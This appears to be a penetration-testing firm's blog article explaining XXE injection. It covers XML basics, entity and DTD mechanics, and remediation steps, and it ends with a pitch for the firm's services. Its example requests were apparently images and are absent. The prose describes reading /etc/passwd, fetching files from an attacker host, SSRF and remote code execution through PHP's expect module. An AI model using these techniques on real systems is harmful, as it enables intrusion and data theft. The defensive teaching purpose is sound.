The addition of XXE (XML Eternal Entity Injection) attacks being added as a new category to the OWASP top 10 in 2017 has been the result of an increased attack presence of this type of vulnerability found in many environments. Even though this attack has been possible for years, major web applications such as Facebook’s third-party career service and PayPal’s Ektron CMS have caused this vulnerability to gain much needed attention.

Attackers have utilized XXE to exploit poorly configured XML processors, which in many cases are set by default, to allow the specification of an external entity reference within XML documents. Through the use of uploading of XML documents or by manipulating vulnerable code and 3rd party dependencies, attackers have found ways that may expose this vulnerability by taking advantage of external entities for attacks such as: remote code execution, disclosure of sensitive information, access to SMB file shares, Server-Side Request Forgery (SSRF), data extraction, internal system/port scans, and denial-of-service.

What is XML?

Extensible Markup Language (XML) was originally created for use among desktop publishing services but has now become a popular way for various types of applications to exchange data among each other and is typically used in many situations more than HTML for data interchange. This has made XML an extremely popular data format that is implemented in many types of web applications, services, and documents. This allows two systems running different technologies to communicate and exchange data. In order for XML data to be interpreted, the applications need some form of XML parser or XML processor that is capable of understanding its format to either transfer the data to another format or simply output the result.

A typical simple example of an XML document, which in this case describes books, that a web application can accept as XML input, parses, and outputs the result is shown below. The root element of this document is “bookstore”, which contains child elements called “book”. The “book” contains sub-child elements “author”, “title”, and “publish_date”. If this basic XML document shown below is either sent in a request or uploaded to a web application that has been configured to accept and is capable of parsing XML input, the output after it was parsed would display the sub-child elements.

Request of XML File:

Response:

Figure 1: Response from XML Request

Impact and Risk

XXE vulnerabilities are in the category of injection attacks, which are similar to command injection (e.g. bash language injection) and SQL injection (i.e. SQL database language). In the case of XXE, the attack is focusing on the XML language which provides the opportunity for an attacker to exploit the backend system running the application that is responsible for parsing or interpreting the XML documents. The external entities vulnerability can also be very similar to Local File Inclusion (LFI) and Remote File Inclusion (RFI) exploits where an attacker can access local system files or remotely access items that an attacker chooses the application to dynamically include such as external files or scripts.

The XXE flaw can allow an attacker to turn the XML parser into a proxy which allows local and remote content to be served on request. In all these types of attacks the main issue is that proper input sanitization has not been performed, which allows the attacker to execute malicious commands on the vulnerable server. In addition, the XML “external entities” are typically supported by default which allows the probability of this type of attack occurring in many production environments.

Technical Trenches

This section is geared towards application developers or system administrators who are seeking to understand why XXE vulnerabilities exist, how they work, and how to properly mitigate them. For those not looking to get deep in technical details, you can skip to the Remediation section.

What are XML external entities?

XML documents can contain “entities” that are defined within the DOCTYPE header and have the ability to access remote external systems or local content found within the server hosting the web application and XML parser. When the web application parses the XML document, it has the ability to replace the “entity” with the value that is specified. This XML Scheme Definition (XSD, newer) or Document Type Definitions (DTD, legacy) are used to validate XML documents by declaring what type of document will be defined so the parser knows how to process it. The issue here is that even though DTDs are an older legacy way of defining the type of document being used before it is processed, it is still very commonly used by applications and can also be vulnerable to triggering XXE.

Consider an example of the XML document using DTD and the explained sections found below. Once the XML entity “xxe” is parsed as “&xxe” it will be triggered to display the defined XML entity.

XML Data Type Definition (DTD)

Figure 2: XML Data Type Definition

Request of XML File:

Response:

Figure 3: Response from XML Request

XXE Attack Scenario

Attackers can take advantage of the XML external entities to use this vulnerability to utilize its external functionality. Consider the following malicious XXE example of leveraging the “SYSTEM” identifier to access local content on a system hosting the XML PHP application parser. Using an identifier which is declared as the “SYSTEM” identifier instructs the parser that the entity value should be read from the URI that follows. In many cases, the XXE vulnerability can also be an example of how an attacker can leverage this misconfiguration of the XML parser essentially turning it into a proxy server so they can execute Server-Side Request Forgery (SSRF) attacks, and gain access further into the intranet network or possibly connect to external public servers from behind the firewall.

Figure 4: XXE Attack flow

The attack scenario will continue with the same bookstore theme that consists of some form of a simple PHP application that is hosted to accept book input from users containing the author, title, and publishing_date. This information can be sent through a POST command to the applications website. An attacker can utilize the XML entities definition and SYSTEM identifier on the XML parser to accept maliciously crafted requests containing XML files that are seemingly harmless to the firewall or the application because the functionality of these services are not being directly attacked. In the examples below the external entity “xxe” would display the contents of file:///etc/passwd by performing a rudimentary LFI related attack.

Request of XML File:

Response:

Figure 5: XML attack POC

The attacker is not confined to only accessing local files on the local exploited machine. They can recreate a RFI type of attack where they can access files remotely via http. This type of attack can also be used to circumvent firewalls and gain access to other internal systems within the intranet that regularly would not be available to the attacker. Depending on the XML parser, it may be possible to access the contents of files from other systems on the local network through HTTP requests that are completely behind the protection of external firewalls. In the example below the file malicious.txt contains the content “Remote file accessed via http!!”, and is located on the external website http://myattacksite.

Contents of malicious.txt

Figure 6: XXE File Inclusion

Request of XML File:

Response:

Figure 7: XXE File Inclusion POC

In situations where the PHP code on the targeted web server has the “expect” module enabled, it can increase the severity of the situation by allowing remote code execution via PHP. In some cases, this may also provide the ability to conduct port scanning of the internal network for further lateral movement and reconnaissance of the organizations infrastructure.

Request of XML File:

Response:

Figure 8: XXE Code Execution POC

Remediation

XXE attacks can be a major risk to any organization and can result in severe consequences. The main vulnerability exists in that the XML parser parses the untrusted data sent by any user, which can become malicious in nature. However, it may not be easy or possible to validate only data present within the system identifier in the DTD. The other main issue is that most XML parsers are vulnerable to XML external entity attacks (XXE) because this configuration is set by default.

Therefore, the best solution would be to configure the XML processor to use a local static DTD and disallow any declared DTD included in the XML document. The simplest and safest way to prevent against XXE attacks it to completely disable Document Type Definitions (DTDs) altogether, especially if they are not essential to the application’s functionality. Detailed guidance on how to disable XXE processing, or otherwise defend against XXE attacks is presented in the XML External Entity (XXE) Prevention Cheat Sheet.

  • Avoid allowing application functionality that parses XML documents
  • Implement input validation that prevents malicious data from being defined with the SYSTEM identifier portion of the entity within the document type declaration (DTD)
  • Configure the XML parser to not validate and process any declarations within the DTD
  • Configure the XML parser to not resolve external entities within the DTD

How we can help

The Packetlabs team is composed of highly trained and experienced ethical hackers that focus and excel at the discovery, exploiting, and chaining together multiple vulnerabilities that often are overlooked. Our team members have the highest regarded certifications in industry including the Offensive Security Certified Professional (OSCP), Offensive Security Certified Expert (OSCE), GIAC Web Application Penetration Tester (GWAPT), and GIAC Exploit Researcher and Advanced Penetration Tester (GXPN) certifications. Please contact us to learn more or speak to us about how we can help.